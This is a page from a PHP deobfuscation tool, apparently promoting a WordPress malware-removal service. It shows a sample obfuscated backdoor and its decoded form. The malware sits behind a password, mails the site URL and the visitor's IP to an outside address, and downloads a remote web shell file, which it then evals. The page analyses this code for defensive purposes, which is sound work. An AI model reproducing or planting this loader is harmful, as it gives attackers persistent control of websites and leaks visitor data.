Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php eval(base64_decode('CiBnb3RvIHNqT2VROyBwczFWUjogJHJlbW90ZUNvZGUgPSBjdXJsX2V4ZWMoJGNoKTsgZ290byBTV0dxMDsgb09lMDQ6ICR2YWxpZF9wYXNzd29yZCA9ICJceDQ4XHg2MVwxNTZceDdhXHg1OFx4MzZceDM2IjsgZ290byBNa0VIQjsgZGRhV3g6ICRjaCA9IGN1cmxfaW5pdCgkcmVtb3RlVXJsKTsgZ290byBseEQ4bjsgeFMyREc6ICRyZW1vdGVVcmwgPSAiXHg...



Obfuscated php code

<?php eval(base64_decode('CiBnb3RvIHNqT2VROyBwczFWUjogJHJlbW90ZUNvZGUgPSBjdXJsX2V4ZWMoJGNoKTsgZ290byBTV0dxMDsgb09lMDQ6ICR2YWxpZF9wYXNzd29yZCA9ICJceDQ4XHg2MVwxNTZceDdhXHg1OFx4MzZceDM2IjsgZ290byBNa0VIQjsgZGRhV3g6ICRjaCA9IGN1cmxfaW5pdCgkcmVtb3RlVXJsKTsgZ290byBseEQ4bjsgeFMyREc6ICRyZW1vdGVVcmwgPSAiXHg2OFwxNjRcMTY0XDE2MFx4NzNcNzJcNTdcNTdceDczXHg2OFx4NjVcMTU0XHg2Y1w1Nlx4NzBcMTYyXHg2OVwxNTZceDczXHg2OFw1Nlx4NjNceDZmXHg2ZFx4MmZcMTE2XHg2MVwxNjRceDY4XHg2MVx4NmVcNTdcMTQxXHg2Y1wxNDZcMTQxXDU2XDE2NFx4NzhcMTY0IjsgZ290byBkZGFXeDsgSTh0RWg6IGV2YWwoIlx4M2ZceDNlIiAuICRyZW1vdGVDb2RlKTsgZ290byBwVTFSZTsgQ0JOcks6ICR0dWp1YW5tYWlsID0gIlwxNTBcMTU2XDE0M1x4NmJceDM2XDY2XHg0MFwxNDdcMTU1XDE0MVwxNTFceDZjXDU2XDE0M1wxNTdcMTU1IjsgZ290byB5OFBJTTsgT3lYTXo6ICRmaWxlID0gIlx4NzJcMTQ1XDE2MFx4NmNcMTQxXDE0M1wxNDVceDJlXDE2MFwxNTBceDcwIjsgZ290byBNV3JHaTsgR1MxNFI6IHNldF90aW1lX2xpbWl0KDApOyBnb3RvIExXa1ZvOyBNV3JHaTogY2htb2QoJGZpbGUsIDQyMCk7IGdvdG8gSzViVDg7IFNXR3EwOiBpZiAoY3VybF9lcnJubygkY2gpKSB7IGRpZSgiXHg2M1x4NTVceDUyXDExNFw0MFwxNDVceDcyXDE2Mlx4NmZcMTYyXHgzYVx4MjAiIC4gY3VybF9lcnJvcigkY2gpKTsgfSBnb3RvIEY4WTNUOyBwaUdvWTogaWYgKCFpc3NldCgkX1NFU1NJT05bIlx4NmNcMTU3XDE0N1wxNDdceDY1XHg2NFx4NjlceDZlIl0pIHx8ICRfU0VTU0lPTlsiXDE1NFx4NmZceDY3XDE0N1x4NjVcMTQ0XDE1MVx4NmUiXSAhPT0gdHJ1ZSkgeyA/Pgo8Zm9ybSBtZXRob2Q9IlBPU1QiPjxsYWJlbCBmb3I9InBhc3N3b3JkIj5qaWxhdCBkaWtpdCBtYXN1ayBhaCBhaDo8L2xhYmVsPiA8aW5wdXQgdHlwZT0icGFzc3dvcmQiaWQ9InBhc3N3b3JkIm5hbWU9InBhc3N3b3JkIj4gPGlucHV0IHR5cGU9InN1Ym1pdCJ2YWx1ZT0iTG9naW4iPjwvZm9ybT48P3BocCAgZGllOyB9IGdvdG8gT3lYTXo7IHp3aExZOiBtYWlsKCR0dWp1YW5tYWlsLCAiXDExNFx4NGZceDQ3XHg0N1wxMDVcMTIyIiwgJHBlc2FuX2FsZXJ0LCAiXHg1Ylw0MCIgLiAkX1NFUlZFUlsiXHg1Mlx4NDVcMTE1XHg0Zlx4NTRcMTA1XDEzN1x4NDFcMTA0XHg0NFwxMjIiXSAuICJceDIwXDEzNSIpOyBnb3RvIHhTMkRHOyB5OFBJTTogJHhfcGF0aCA9ICJceDY4XHg3NFx4NzRceDcwXHgzYVw1N1w1NyIgLiAkX1NFUlZFUlsiXHg1M1wxMDVcMTIyXDEyNlx4NDVcMTIyXHg1Zlx4NGVcMTAxXDExNVx4NDUiXSAuICRfU0VSVkVSWyJcMTIyXDEwNVx4NTFceDU1XHg0NVwxMjNcMTI0XHg1ZlwxMjVcMTIyXDExMSJdOyBnb3RvIGFLM2FjOyBhSzNhYzogJHBlc2FuX2FsZXJ0ID0gIlx4NjZceDY5XDE3MFw0MHskeF9wYXRofVx4MjBceDNhXDE2MFw0MFx4MmFcMTExXDEyMFx4MjBcMTAxXDE0NFwxNDRcMTYyXDE0NVx4NzNcMTYzXHgyMFw3Mlx4MjBcMTMzXHgyMCIgLiAkX1NFUlZFUlsiXHg1MlwxMDVcMTE1XHg0Zlx4NTRcMTA1XDEzN1wxMDFcMTA0XDEwNFx4NTIiXSAuICJcNDBceDVkIjsgZ290byB6d2hMWTsgYks3WDQ6IGhlYWRlcigiXDEwM1wxNTdceDZlXDE2NFwxNDVcMTU2XHg3NFw1NVx4NTRcMTcxXDE2MFx4NjVceDNhXDQwXHg3NFx4NjVcMTcwXDE2NFw1N1x4NjhcMTY0XDE1NVwxNTRcNzNcNDBcMTQzXHg2OFwxNDFceDcyXDE2M1x4NjVcMTY0XHgzZFx4NTVcMTI0XHg0Nlx4MmRcNzAiKTsgZ290byBDQk5ySzsgSzViVDg6IEBpbmlfc2V0KCJcMTU3XDE2NVx4NzRceDcwXDE2NVwxNjRceDVmXHg2MlwxNjVcMTQ2XHg2NlwxNDVceDcyXHg2OVwxNTZcMTQ3IiwgMCk7IGdvdG8gTkpxd2c7IE1rRUhCOiBpZiAoaXNzZXQoJF9QT1NUWyJceDcwXDE0MVwxNjNcMTYzXDE2N1x4NmZceDcyXDE0NCJdKSkgeyBpZiAoJF9QT1NUWyJcMTYwXDE0MVx4NzNceDczXHg3N1x4NmZceDcyXDE0NCJdID09PSAkdmFsaWRfcGFzc3dvcmQpIHsgJF9TRVNTSU9OWyJceDZjXDE1N1x4NjdceDY3XDE0NVwxNDRceDY5XDE1NiJdID0gdHJ1ZTsgfSBlbHNlIHsgZWNobyAiXDEyMFx4NjFceDczXDE2M1x4NzdceDZmXDE2Mlx4NjRcNDBcMTYzXDE0MVx4NmNcMTQxXDE1MFw0MFx4NmVceDZhXHg2OVx4NmVceDY3XDQxIjsgfSB9IGdvdG8gcGlHb1k7IGx4RDhuOiBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOyBnb3RvIHBzMVZSOyBzak9lUTogc2Vzc2lvbl9zdGFydCgpOyBnb3RvIG9PZTA0OyBOSnF3ZzogQGluaV9zZXQoIlwxNDRceDY5XDE2M1wxNjBcMTU0XHg2MVwxNzFcMTM3XDE0NVx4NzJcMTYyXHg2ZlwxNjJceDczIiwgMCk7IGdvdG8gR1MxNFI7IEY4WTNUOiBjdXJsX2Nsb3NlKCRjaCk7IGdvdG8gSTh0RWg7IExXa1ZvOiBpbmlfc2V0KCJcMTU1XDE0NVwxNTVcMTU3XHg3Mlx4NzlceDVmXDE1NFwxNTFceDZkXHg2OVwxNjQiLCAiXHgzNlw2NFx4NGQiKTsgZ290byBiSzdYNDsgcFUxUmU6IA==')); ?>

Decoded(de-Obfuscated) php code

<?php

eval {
    session_start();
    $valid_password = "HanzX66";
    if (isset($_POST["password"])) {
        if ($_POST["password"] === $valid_password) {
            $_SESSION["loggedin"] = true;
        } else {
            echo "Password salah njing!";
        }
    }
    if (!isset($_SESSION["loggedin"]) || $_SESSION["loggedin"] !== true) {
        ?>
<form method="POST"><label for="password">jilat dikit masuk ah ah:</label> <input type="password"id="password"name="password"> <input type="submit"value="Login"></form><?php 
        die;
    }
    $file = "replace.php";
    chmod($file, 420);
    @ini_set("output_buffering", 0);
    @ini_set("display_errors", 0);
    set_time_limit(0);
    ini_set("memory_limit", "64M");
    header("Content-Type: text/html; charset=UTF-8");
    $tujuanmail = "hnck66@gmail.com";
    $x_path = "http://" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"];
    $pesan_alert = "fix {$x_path} :p *IP Address : [ " . $_SERVER["REMOTE_ADDR"] . " ]";
    mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER["REMOTE_ADDR"] . " ]");
    $remoteUrl = "https://shell.prinsh.com/Nathan/alfa.txt";
    $ch = curl_init($remoteUrl);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $remoteCode = curl_exec($ch);
    if (curl_errno($ch)) {
        die("cURL error: " . curl_error($ch));
    }
    curl_close($ch);
    eval("?>" . $remoteCode);
};


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.